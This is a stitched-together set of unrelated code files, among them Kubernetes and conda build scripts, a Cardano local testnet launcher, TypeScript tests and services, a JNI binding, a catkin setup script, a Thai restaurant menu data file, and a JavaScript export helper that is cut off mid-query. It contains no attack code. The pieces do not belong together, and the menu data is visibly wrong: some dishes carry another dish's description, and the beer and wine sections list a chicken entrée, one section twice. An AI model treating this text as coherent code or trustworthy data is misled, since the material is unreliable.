for platform in "${platforms[@]}"; do
kube::log::status "Building go targets for ${platform}:" "${targets[@]}"
kube::golang::set_platform_envs "${platform}"
kube::golang::build_binaries_for_platform ${platform} ${use_go_build:-}
done
fi
)
}
|
#!/bin/bash
mkdir -p $PREFIX/bin
mkdir -p $PREFIX/opt/ditasic/
cp -r * $PREFIX/opt/ditasic/
ln -s $PREFIX/opt/ditasic/ditasic $PREFIX/bin/
ln -s $PREFIX/opt/ditasic/ditasic_mapping.py $PREFIX/bin/
ln -s $PREFIX/opt/ditasic/ditasic_matrix.py $PREFIX/bin/
ln -s $PREFIX/opt/ditasic/core $PREFIX/bin/
|
<reponame>asalkeld/node-sdk
// Copyright 2021, Nitric Technologies Pty Ltd.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
import { events } from './events';
import { FaasServiceClient } from '@nitric/api/proto/faas/v1/faas_grpc_pb';
const proto = FaasServiceClient.prototype;
// We only need to handle half of the duplex stream
class MockClientStream<Req, Resp> {
public recievedMessages: Req[] = [];
private listeners: {
[event: string]: ((req: Resp | string) => void)[];
} = {};
public write(req: Req) {
this.recievedMessages.push(req);
}
public on(event: string, cback: (req: Resp) => void) {
if (!this.listeners[event]) {
this.listeners[event] = [];
}
this.listeners[event].push(cback);
}
public emit(event: string, req: Resp | string) {
if (this.listeners[event]) {
this.listeners[event].forEach((l) => l(req));
}
}
}
describe('test queues snippets', () => {
let mockStream = null as any;
beforeEach(() => {
mockStream = new MockClientStream() as any;
jest.spyOn(proto, 'triggerStream').mockReturnValue(mockStream);
});
test('events snippet', async () => {
// Ensure event snippet is valid typescript
const evtPromise = events();
// close the stream
mockStream.emit('end', 'EOF');
await expect(evtPromise).resolves.toEqual(undefined);
});
});
|
/*
*
* ExperimentDetailAssetPage actions
*
*/
import {
LOAD_EXPERIMENT_DETAIL_ASSET,
LOAD_EXPERIMENT_DETAIL_ASSET_SUCCESS,
LOAD_EXPERIMENT_DETAIL_ASSET_ERROR,
LOAD_ASSET_META_FIELD,
LOAD_ASSET_META_FIELD_SUCCESS,
LOAD_ASSET_META_FIELD_ERROR,
LOAD_ASSET_BLOB,
LOAD_ASSET_BLOB_SUCCESS,
LOAD_ASSET_BLOB_ERROR,
} from './constants';
export function loadExperimentAssetAction(modelId) {
return {
type: LOAD_EXPERIMENT_DETAIL_ASSET,
modelId,
};
}
export function loadExperimentAssetSuccessAction(assetData) {
return {
type: LOAD_EXPERIMENT_DETAIL_ASSET_SUCCESS,
assetData,
};
}
export function loadExperimentAssetErrorAction(error) {
return {
type: LOAD_EXPERIMENT_DETAIL_ASSET_ERROR,
error,
};
}
export function loadExperimentAssetFieldAction(modelId) {
return {
type: LOAD_ASSET_META_FIELD,
modelId,
};
}
export function loadExperimentAssetFieldSuccessAction(assetFieldData) {
return {
type: LOAD_ASSET_META_FIELD_SUCCESS,
assetFieldData,
};
}
export function loadExperimentAssetFieldErrorAction(error) {
return {
type: LOAD_ASSET_META_FIELD_ERROR,
error,
};
}
export const loadAssetBlob = (modelId, assetId) => ({
type: LOAD_ASSET_BLOB,
modelId,
assetId,
});
export const loadAssetBlobSuccess = (assetBlobData) => ({
type: LOAD_ASSET_BLOB_SUCCESS,
assetBlobData,
});
export const loadAssetBlobError = (error) => ({
type: LOAD_ASSET_BLOB_ERROR,
error,
});
|
#!/usr/bin/env bash
# This script is intended to be as simple as possible i.e execute and have a
# cluster of 3 shelley nodes up and running.
ROOT="$(realpath "$(dirname "$0")/../..")"
configuration="${ROOT}/scripts/lite/configuration"
if [ "$1" == "" ];then
data_dir="$(mktemp).d"
else
data_dir=$1
fi
mkdir -p "${data_dir}"
# Generate shelley genesis spec
ARGSSPEC=(
--genesis-dir "${data_dir}/genesis"
--testnet-magic 42
)
cabal run exe:cardano-cli -- genesis create "${ARGSSPEC[@]}"
OS=$(uname -s)
case $OS in
Darwin ) DATE="gdate"; SED='gsed';;
* ) DATE="date"; SED='sed' ;;
esac
# We're going to use really quick epochs (300 seconds), by using short slots 1s
# and K=10, but we'll keep long KES periods so we don't have to bother
# cycling KES keys
$SED -i ${data_dir}/genesis/genesis.spec.json \
-e 's/"slotLength": 1/"slotLength": 1/' \
-e 's/"activeSlotsCoeff": 5.0e-2/"activeSlotsCoeff": 0.1/' \
-e 's/"securityParam": 2160/"securityParam": 10/' \
-e 's/"epochLength": 432000/"epochLength": 1500/' \
-e 's/"maxLovelaceSupply": 0/"maxLovelaceSupply": 9000/' \
-e 's/"decentralisationParam": 1.0/"decentralisationParam": 0.7/'
# Generate shelley genesis "for real"
ARGS=(
--genesis-dir "${data_dir}/genesis"
--gen-genesis-keys 3
--gen-utxo-keys 3
--testnet-magic 42
)
cabal run exe:cardano-cli -- genesis create "${ARGS[@]}"
# Compute genesis hash
cabal run exe:cardano-cli -- genesis hash --genesis "${data_dir}/genesis/genesis.json" | tail -1 > "${data_dir}"/genesis/GENHASH
# Ensure the node is built
cabal run --no-stats cardano-node cardano-node --help >/dev/null || true
for i in 1 2 3; do
# Use copy default configuration and topolgy to configuration directory for a particular node instance
cp -af "${configuration}/shelley-$i.yaml" "${data_dir}"
cp -af "${configuration}/topology-node-$i.json" "${data_dir}"
db_dir="${data_dir}/db/node-$i"
socket_dir="${data_dir}/socket"
mkdir -p "${db_dir}"
mkdir -p "${socket_dir}"
esc=$(printf '\033')
# We need the following for a shelley node to be able to mint blocks:
# - KES signing key
# - VRF signing key
# - Operational certificate
# VRF keys have already been generated in the shelley genesis create command
# Generate a KES keys
mkdir -p "${data_dir}/node-$i"
cabal run exe:cardano-cli -- node key-gen-KES \
--verification-key-file "${data_dir}/node-$i/kes.vkey" \
--signing-key-file "${data_dir}/node-$i/kes.skey"
# Move genesis delegate keys generated in shelley genesis create command to its
# respective node folder.
mv "${data_dir}/genesis/delegate-keys/delegate$i.skey" "${data_dir}/node-$i/hotkey.skey"
mv "${data_dir}/genesis/delegate-keys/delegate$i.vkey" "${data_dir}/node-$i/hotkey.vkey"
mv "${data_dir}/genesis/delegate-keys/delegate$i.counter" "${data_dir}/node-$i/counterFile.counter"
mv "${data_dir}/genesis/delegate-keys/delegate$i.vrf.skey" "${data_dir}/node-$i/vrf.skey"
mv "${data_dir}/genesis/delegate-keys/delegate$i.vrf.vkey" "${data_dir}/node-$i/vrf.vkey"
# Set permissions for the vrf private key file: read for owner only
chmod gou-rwx "${data_dir}/node-$i/vrf.skey"
chmod u+r "${data_dir}/node-$i/vrf.skey"
# Issue an operational certificate:
cabal run exe:cardano-cli -- node issue-op-cert \
--kes-period 0 \
--kes-verification-key-file "${data_dir}/node-$i/kes.vkey" \
--cold-signing-key-file "${data_dir}/node-$i/hotkey.skey" \
--operational-certificate-issue-counter-file "${data_dir}/node-$i/counterFile.counter" \
--out-file "${data_dir}/node-$i/opcert"
# Launch a node
cabal run exe:cardano-node -- run \
--database-path "${db_dir}" \
--socket-path "${socket_dir}/node-$i-socket" \
--port "300$i" \
--config "${data_dir}/shelley-$i.yaml" \
--topology "${data_dir}/topology-node-$i.json" \
--shelley-vrf-key "${data_dir}/node-$i/vrf.skey" \
--shelley-kes-key "${data_dir}/node-$i/kes.skey" \
--shelley-operational-certificate "${data_dir}/node-$i/opcert" \
| sed "s|^|${esc}[$((31+$i))m[node-$i]${esc}[0m |g" &
done
rm -r "${data_dir}/genesis/delegate-keys"
function cleanup()
{
for child in $(jobs -p); do
echo kill "$child" && kill "$child"
done
}
cat
trap cleanup EXIT
|
package net.jlxip.sockswrapper;
public class SocksWrapper {
public static int timeout = 5000;
}
|
<reponame>mk12/mycraft<filename>lib/LWJGL/lwjgl-source-2/src/native/generated/opengl/org_lwjgl_opengl_EXTBlendFuncSeparate.c
/* MACHINE GENERATED FILE, DO NOT EDIT */
#include <jni.h>
#include "extgl.h"
typedef void (APIENTRY *glBlendFuncSeparateEXTPROC) (GLenum sfactorRGB, GLenum dfactorRGB, GLenum sfactorAlpha, GLenum dfactorAlpha);
JNIEXPORT void JNICALL Java_org_lwjgl_opengl_EXTBlendFuncSeparate_nglBlendFuncSeparateEXT(JNIEnv *env, jclass clazz, jint sfactorRGB, jint dfactorRGB, jint sfactorAlpha, jint dfactorAlpha, jlong function_pointer) {
glBlendFuncSeparateEXTPROC glBlendFuncSeparateEXT = (glBlendFuncSeparateEXTPROC)((intptr_t)function_pointer);
glBlendFuncSeparateEXT(sfactorRGB, dfactorRGB, sfactorAlpha, dfactorAlpha);
}
|
<gh_stars>0
import { Injectable } from '@nestjs/common';
import { RentBicycle } from './rent-bicycle.entity';
import { InjectRepository } from '@nestjs/typeorm';
import { getConnection, Repository } from 'typeorm';
import { CreateBicycleDto } from '../bicycle/dto/create-bicycle.dto';
import { CreateRentBicycleDto } from './dto/create-rent-bicycle.dto';
import { BicycleService } from '../bicycle/bicycle.service';
import { Bicycle } from '../bicycle/bicycle.entity';
@Injectable()
export class RentBicycleService {
constructor(
@InjectRepository(RentBicycle)
private rentBicycleRepository: Repository<RentBicycle>,
) {}
public async create(Time: number, bicycle: Bicycle): Promise<RentBicycle> {
const rentDate = Date.now();
const rentTime = Time * 3600000;
const RentBike = this.rentBicycleRepository.save({
rentTime,
rentDate,
bicycle,
});
return RentBike;
}
public async getRentBicycle() {
return await getConnection()
.createQueryBuilder()
.select('rentBicycle')
.from(RentBicycle, 'rentBicycle')
.getMany();
}
public async checkRentStatus() {
const nowDate = Date.now();
await getConnection()
.createQueryBuilder()
.delete()
.from(RentBicycle)
.where(':nowDate - rentDate > rentTime', {
nowDate,
})
.execute();
}
public async cancelRent(idProps: number) {
await this.rentBicycleRepository.delete({ bicycleId: idProps });
}
}
|
<reponame>liamdawson/DIM
import React from 'react';
import { DestinyActivityModifierDefinition } from 'bungie-api-ts/destiny2';
import BungieImage from '../dim-ui/BungieImage';
import PressTip from '../dim-ui/PressTip';
export function ActivityModifier(props: { modifier: DestinyActivityModifierDefinition }) {
const { modifier } = props;
return (
<div className="milestone-modifier">
<BungieImage src={modifier.displayProperties.icon} />
<div className="milestone-modifier-info">
<PressTip tooltip={modifier.displayProperties.description}>
<div className="milestone-modifier-name">{modifier.displayProperties.name}</div>
</PressTip>
</div>
</div>
);
}
|
<gh_stars>0
export default {
foods: [
{
name: 'Appetizers',
items: [
{
name: 'Crispy Egg Rolls',
description: 'Silver noodle, dried mushroom, cabbage and carrot served with plum sauce.',
price: 4.5,
imgUrl: null
},
{
name: 'Crispy Tofu',
description: 'Crispy Japanese tofu served with sweet chili sauce and peanut.',
price: 4.5,
imgUrl: null
},
{
name: '<NAME>ls',
description: 'Bean spouts, lettuce, cilantro and soft rice noodle wrapped in fresh rice paper served with homemade peanut dipping sauce.',
price: {
Tofu: 4.5,
Shrimp: 6
},
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy wonton filled with imitation crab meat and cream cheese served with plum sauce',
price: 6.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy prawn with coconut shaving served with plum sauce.',
price: 7.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Marinated chicken wing, lightly breaded and fried until golden and crispy.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Grilled marinated chicken skewers served with peanut sauce and cucumber sauce.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Fried pork and cabbage dumpling served with ginger soy dipping sauce.',
price: 6,
imgUrl: null
},
{
name: '<NAME>',
description: 'Ground chicken and shrimp wrapped in a flour trailla deep-fried.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Steam blue mussels with aromatic lemongrass and set in basil broth.',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy calamari served with Siracha cream sauce.',
price: 10,
imgUrl: null
}
]
},
{
name: 'Soups',
items: [
{
name: '<NAME>',
description: 'Spicy lemongrass broth soup with kaffir, tomato, mushroom, onion and lime juice.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
spice: 2,
imgUrl: null
},
{
name: '<NAME>',
description: 'Galangal, lemongrass, kaffir leaves, mushroom, cabbage, lime juice and coconut milk.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
imgUrl: null
},
{
name: '<NAME>',
description: 'Shrimp wonton, shrimp, lettuce and bean sprout in clear broth soup.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
imgUrl: null
}
]
},
{
name: 'Salads',
items: [
{
name: 'House Salad',
description: 'Crispy tofu, hardboiled egg, lettuce, cucumber, grape tomato, red onion and cilantro served with curry peanut sweet and sour sauce.',
price: 7,
additions: [
{
name: 'Grilled chicken',
price: 4
}
],
imgUrl: null
},
{
name: 'Papaya Salad',
description: 'Shredded green papaya, Thai chili, green bean, tomato and peanut with spicy lime dressing.',
price: 8,
additions: [
{
name: 'Grilled shrimp',
price: 4
}
],
imgUrl: null
},
{
name: 'Glass Noodle Salad',
description: 'Steam glass noodle, ground chicken, shrimp, squid, onion, red onion, mint, cilantro tossed with chili lime juice and sweet chili paste.',
price: 12.95,
additions: [],
imgUrl: null
},
{
name: 'Beef Salad',
description: 'Grilled beef sirloin, tomato, cucumber, red onion, bell pepper, mints and cilantro with spicy lime dressing.',
price: 12,
additions: [],
imgUrl: null
},
{
name: 'Larb',
description: 'Ground chicken roosted rice powder, red onion, mints, cilantro, tossed with chili lime juice.',
price: 11.95,
additions: [],
imgUrl: null
}
]
},
{
name: 'Stir-Fried',
description: 'Served with steamed rice. Substitute brown rice add $1 Choice of Chicken, Tofu, Vegetable $11, Beef or Pork $12, Shrimp $14, Seafood $16',
items: [
{
name: 'Stir-Fried Cashew Nut',
description: 'Onion, celery, bell pepper, carrot, and cashew nut in roasted sweet chili sauce.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/cashew_orig.jpg'
},
{
name: 'Stir-Fried Fresh Ginger',
description: 'Fresh ginger, mushroom, onion, carrot, and bell pepper.',
price: null,
additions: [],
imgUrl: null
},
{
name: 'Stir-Fried Garlic',
description: 'Sautéed roasted garlic, onion, mushroom, and cilantro in black pepper sauce over a bed of broccoli.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/garlic_orig.jpg'
},
{
name: 'Stir-Fried Mixed Vegetables',
description: 'Stir-fried mixed vegetables in a wok with garlic soy sauce.',
price: null,
additions: [],
imgUrl: null
},
{
name: '<NAME>',
description: 'Steamed mixed vegetables topped with house peanut sauce.',
price: null,
additions: [],
imgUrl: null
},
{
name: 'Stir-Fried Basil',
description: 'Stir-fried ground chicken with bell pepper, green bean, onion and basil.',
price: 11.95,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/stir-fried-basil_orig.jpg'
},
{
name: 'Stir-Fried Eggplant',
description: 'Onion, bell pepper, eggplant, and basil in roasted sweet chili sauce.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'Curries',
description: 'Served with steamed rice. Substitute brown rice add $1 Choice of Chicken, Tofu, Vegetable $11, Beef or Pork $12 Shrimp $14, Seafood $16',
items: [
{
name: 'Red Curry',
description: 'Red curry with coconut milk, bamboo shoot, bell pepper, and basil.',
price: null,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Green Curry',
description: 'Green curry with coconut milk, bamboo shoot, bell pepper, eggplant and basil.',
price: null,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/green-curry_orig.jpg'
},
{
name: 'Yellow Curry',
description: 'Yellow curry with coconut milk, potato, onion, carrot and sprinkled with shallots.',
price: null,
spice: 1,
additions: [],
imgUrl: null
},
{
name: 'Panang Curry',
description: 'A Panang curry with coconut milk, green bean, and bell peppers topped with ground peanut.',
price: null,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/panang_orig.jpg'
},
{
name: 'Mussaman Curry',
description: 'A mild slow cooked curry made with a blend of spices including nutmeg, cumin and cloves in coconut milk with onion, carrot, potato, and peanuts.',
price: null,
spice: 1,
additions: [],
imgUrl: null
},
{
name: 'Jungle Curry (no coconut milk)',
description: 'Spicy clear red curry with Thai herbs, fresh vegetables, bamboo shoot, mushroom, bell pepper and basil.',
price: null,
spice: 3,
additions: [],
imgUrl: null
}
]
},
{
name: 'Noodles',
items: [
{
name: '<NAME>',
description: 'Stir-fried wide-size rice in tamarind sauce with egg, bean sprout, and green onion served with chopped peanuts.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pad-thai_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with Thai chili, egg, onion, bell pepper, broccoli, tomato and basil served with raw bean sprout.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/drunken-noodle_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with egg, carrot, broccoli, and sweet soy sauce.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pad-z-ew_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried bean thread with mushroom, cabbage, onion, celery, carrot, grape tomato, bean sprout and egg.',
price: null,
additions: [],
imgUrl: null
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with egg, cabbage, onion, and bean sprout in house soy sauce.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'Noodles soups',
items: [
{
name: 'Tom Yum Noodle Soup',
description: 'Rice noodle or egg noodle with ground chicken, squid, shrimp, and mussle, bean sprout topped with chopped peanuts.',
price: 12.95,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/tom-yum-noodle_orig.jpg'
},
{
name: 'Clear Broth Noodle Soup',
description: 'Clear broth small rice noodle soup with bean sprout, cilantro and green onion.',
price: {
'Tofu': 11,
'Chicken': 11,
'Beef': 12
},
additions: [],
imgUrl: null
},
{
name: 'Khao Soi',
description: 'Egg noodle, shallot, cilantro in curry soup topped with crispy egg noodle.',
price: {
'Tofu': 11,
'Chicken': 11,
'Beef': 12
},
spice: 1,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/khao-soi_orig.jpg'
}
]
},
{
name: 'Fried Rice',
items: [
{
name: 'Traditional Thai Fried Rice',
description: 'Stir-fried rice with egg, onion, grape tomato, peas, and carrots',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/traditional-fried-rice-shrimp_orig.jpg'
},
{
name: 'Pineapple Fried Rice',
description: 'Stir-fried rice with curry powder, egg, pineapple, cashew nut, raisins, onion, grape tomato, pea and carrot.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pineapple-fried-rice-chicken_orig.jpg'
},
{
name: 'Basil Fried Rice ',
description: 'Stir-fried rice with egg, bell pepper, onion, and basil.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'House Specials',
items: [
{
name: 'Panang Curry Jumbo Prawn',
description: 'Grilled jumbo prawn topped with panang curry, bell pepper, green bean and asparagus.',
price: 17,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Volcano Beef',
description: 'Stir fried beef sirloin, tomato, onion, asparagus, bell pepper, pineapple, grape tomato in house specials sauce',
price: 16,
additions: [],
imgUrl: null
},
{
name: 'Three flavors Salmon',
description: 'Pan fried sockeye salmon, topped with three flavor dressing, green bean, onion and bell pepper topped with crispy basil',
price: 15,
additions: [],
imgUrl: null
},
{
name: 'Terriyaki Chicken',
description: 'Charcoal boiled chicken served with steamed vegtable and rice',
price: 13,
additions: [],
imgUrl: null
},
{
name: 'Crispy Duck Curry',
description: 'Red curry with half roasted duck, pineapple, bell pepper, grape tomatoes, lychee and basil.',
price: 21,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Pumpkin Curry',
description: 'Red curry with half roasted duck, pineapple, bell pepper, grape tomatoes, lychee and basil.',
price: 21,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Dungeness Crab Fried Rice',
description: 'Golden pumpkin, lychee, bell pepper and basil inred curry sauce.',
price: {
'Chicken': 13,
'Pork': 13,
'Beef': 13,
'Tofu': 13,
'Grilled shrimp': 17
},
additions: [],
imgUrl: null
},
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
}
],
drinks: [
{
name: 'Beer',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: 'Wine',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: 'Wine',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: '<NAME>',
items: [
{
name: 'Long Island Iced Tea',
description: 'Vodka, Gin, Tequila, Rum, Triple sec,Sour mix, and Splash of Coke',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: '<NAME>, Triple Sec, Lemon Juice, Simple Syrub and Soda',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Yazi Vodka Ginger Beer, Lime Juice, and Thai Spice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Tequila, Orange Juice',
price: 7,
imgUrl: null
},
{
name: '<NAME>',
description: 'Black Whiskey, Sour Apple Schnapps, and Cranberry Juice',
price: 8,
imgUrl: null
},
{
name: 'Mojito',
description: 'Muddles Fresh Mint, Silver Rum, Triple Sec, Lime Juice, top with Soda',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Silver Rum, Amaretto, Pineapple Juice, Sour Mix, and Garnadines',
price: 9,
imgUrl: null
}
]
},
{
name: 'Martini’s',
items: [
{
name: '<NAME>',
description: 'Citron Vodka, Simple syrub, Triple sec and lemon juice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Banana Liquor, Creme De Cacao and Cream',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Viscova Vodka, Lime Juice, Triple Sec and Chambord',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: 'Pendleton Whiskey, Sour Apple Schnapps, and Cranberry Juice',
price: 8,
imgUrl: null
},
{
name: 'Yazitini',
description: 'Yazi Ginger Vodka, Tripple Sec, Cranberry Juice and Lime Juice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Orange Vodka, Muddled Lemon, Simple Syrub, Sour Mix, and Touch of Chambord',
price: 9,
imgUrl: null
},
{
name: '<NAME>’ <NAME>',
description: 'Pepper Vodka and Splash of Olive Juice',
price: 8,
imgUrl: null
}
]
}
]
} |
#!/usr/bin/env sh
# generated from catkin/cmake/template/setup.sh.in
# Sets various environment variables and sources additional environment hooks.
# It tries it's best to undo changes from a previously sourced setup file before.
# Supported command line options:
# --extend: skips the undoing of changes from a previously sourced setup file
# since this file is sourced either use the provided _CATKIN_SETUP_DIR
# or fall back to the destination set at configure time
: ${_CATKIN_SETUP_DIR:=/catkin_ws/devel}
_SETUP_UTIL="$_CATKIN_SETUP_DIR/_setup_util.py"
unset _CATKIN_SETUP_DIR
if [ ! -f "$_SETUP_UTIL" ]; then
echo "Missing Python script: $_SETUP_UTIL"
return 22
fi
# detect if running on Darwin platform
_UNAME=`uname -s`
_IS_DARWIN=0
if [ "$_UNAME" = "Darwin" ]; then
_IS_DARWIN=1
fi
unset _UNAME
# make sure to export all environment variables
export CMAKE_PREFIX_PATH
export CPATH
if [ $_IS_DARWIN -eq 0 ]; then
export LD_LIBRARY_PATH
else
export DYLD_LIBRARY_PATH
fi
unset _IS_DARWIN
export PATH
export PKG_CONFIG_PATH
export PYTHONPATH
# remember type of shell if not already set
if [ -z "$CATKIN_SHELL" ]; then
CATKIN_SHELL=sh
fi
# invoke Python script to generate necessary exports of environment variables
# use TMPDIR if it exists, otherwise fall back to /tmp
if [ -d "${TMPDIR}" ]; then
_TMPDIR="${TMPDIR}"
else
_TMPDIR=/tmp
fi
_SETUP_TMP=`mktemp "${_TMPDIR}/setup.sh.XXXXXXXXXX"`
unset _TMPDIR
if [ $? -ne 0 -o ! -f "$_SETUP_TMP" ]; then
echo "Could not create temporary file: $_SETUP_TMP"
return 1
fi
CATKIN_SHELL=$CATKIN_SHELL "$_SETUP_UTIL" $@ >> "$_SETUP_TMP"
_RC=$?
if [ $_RC -ne 0 ]; then
if [ $_RC -eq 2 ]; then
echo "Could not write the output of '$_SETUP_UTIL' to temporary file '$_SETUP_TMP': may be the disk if full?"
else
echo "Failed to run '\"$_SETUP_UTIL\" $@': return code $_RC"
fi
unset _RC
unset _SETUP_UTIL
rm -f "$_SETUP_TMP"
unset _SETUP_TMP
return 1
fi
unset _RC
unset _SETUP_UTIL
. "$_SETUP_TMP"
rm -f "$_SETUP_TMP"
unset _SETUP_TMP
# source all environment hooks
_i=0
while [ $_i -lt $_CATKIN_ENVIRONMENT_HOOKS_COUNT ]; do
eval _envfile=\$_CATKIN_ENVIRONMENT_HOOKS_$_i
unset _CATKIN_ENVIRONMENT_HOOKS_$_i
eval _envfile_workspace=\$_CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
unset _CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
# set workspace for environment hook
CATKIN_ENV_HOOK_WORKSPACE=$_envfile_workspace
. "$_envfile"
unset CATKIN_ENV_HOOK_WORKSPACE
_i=$((_i + 1))
done
unset _i
unset _CATKIN_ENVIRONMENT_HOOKS_COUNT
|
const get = require('lodash/get');
const has = require('lodash/has');
const pick = require('lodash/pick');
const uniqBy = require('lodash/uniqBy');
const {
NEVER,
EVENT_TYPE_LIST,
REPETITION_FREQUENCY_TYPE_LIST,
CANCELLATION_CONDITION_LIST,
CANCELLATION_REASON_LIST,
ABSENCE_TYPE_LIST,
ABSENCE_NATURE_LIST,
HOURLY,
CIVILITY_LIST,
END_CONTRACT_REASONS,
SURCHARGES,
PAYMENT_NATURE_LIST,
PAYMENT_TYPES_LIST,
INTERNAL_HOUR,
INTERVENTION,
MANUAL_TIME_STAMPING,
TIMESTAMPING_ACTION_TYPE_LIST,
MANUAL_TIME_STAMPING_REASONS,
EVENT_TRANSPORT_MODE_LIST,
INTRA,
ON_SITE,
REMOTE,
STEP_TYPES,
EXPECTATIONS,
END_OF_COURSE,
OPEN_QUESTION,
SURVEY,
QUESTION_ANSWER,
TIME_STAMPING_ACTIONS,
} = require('./constants');
const DatesHelper = require('./dates');
const { CompaniDate } = require('./dates/companiDates');
const { CompaniDuration } = require('./dates/companiDurations');
const UtilsHelper = require('./utils');
const NumbersHelper = require('./numbers');
const DraftPayHelper = require('./draftPay');
const CourseHelper = require('./courses');
const AttendanceSheet = require('../models/AttendanceSheet');
const DistanceMatrixHelper = require('./distanceMatrix');
const Event = require('../models/Event');
const Bill = require('../models/Bill');
const CreditNote = require('../models/CreditNote');
const Contract = require('../models/Contract');
const CourseSmsHistory = require('../models/CourseSmsHistory');
const CourseSlot = require('../models/CourseSlot');
const Course = require('../models/Course');
const Pay = require('../models/Pay');
const Payment = require('../models/Payment');
const FinalPay = require('../models/FinalPay');
const EventRepository = require('../repositories/EventRepository');
const UserRepository = require('../repositories/UserRepository');
const QuestionnaireHistory = require('../models/QuestionnaireHistory');
const Questionnaire = require('../models/Questionnaire');
const NO_DATA = 'Aucune donnée sur la periode selectionnée';
const workingEventExportHeader = [
'Type',
'Heure interne',
'Service',
'Début planifié',
'Début horodaté',
'Type d\'horodatage',
'Motif',
'Fin planifiée',
'Fin horodatée',
'Type d\'horodatage',
'Motif',
'Durée',
'Répétition',
'Déplacement véhiculé avec bénéficiaire',
'Mode de transport spécifique',
'Équipe',
'Id Auxiliaire',
'Auxiliaire - Titre',
'Auxiliaire - Prénom',
'Auxiliaire - Nom',
'A affecter',
'Id Bénéficiaire',
'Bénéficiaire - Titre',
'Bénéficiaire - Nom',
'Bénéficiaire - Prénom',
'Divers',
'Facturé',
'Annulé',
'Statut de l\'annulation',
'Raison de l\'annulation',
];
const getServiceName = (service) => {
if (!service) return null;
const lastVersion = UtilsHelper.getLastVersion(service.versions, 'startDate');
return lastVersion.name;
};
const getMatchingSector = (histories, event) => histories
.filter(sh => CompaniDate(sh.startDate).isBefore(event.startDate))
.sort(DatesHelper.descendingSort('startDate'))[0];
const displayDate = (path, timestamp = null, scheduledDate = null) => {
if (timestamp) return CompaniDate(get(timestamp, path)).format('dd/LL/yyyy HH:mm:ss');
if (scheduledDate) return CompaniDate(scheduledDate).format('dd/LL/yyyy HH:mm:ss');
return '';
};
exports.getWorkingEventsForExport = async (startDate, endDate, companyId) => {
const query = {
company: companyId,
type: { $in: [INTERVENTION, INTERNAL_HOUR] },
$or: [
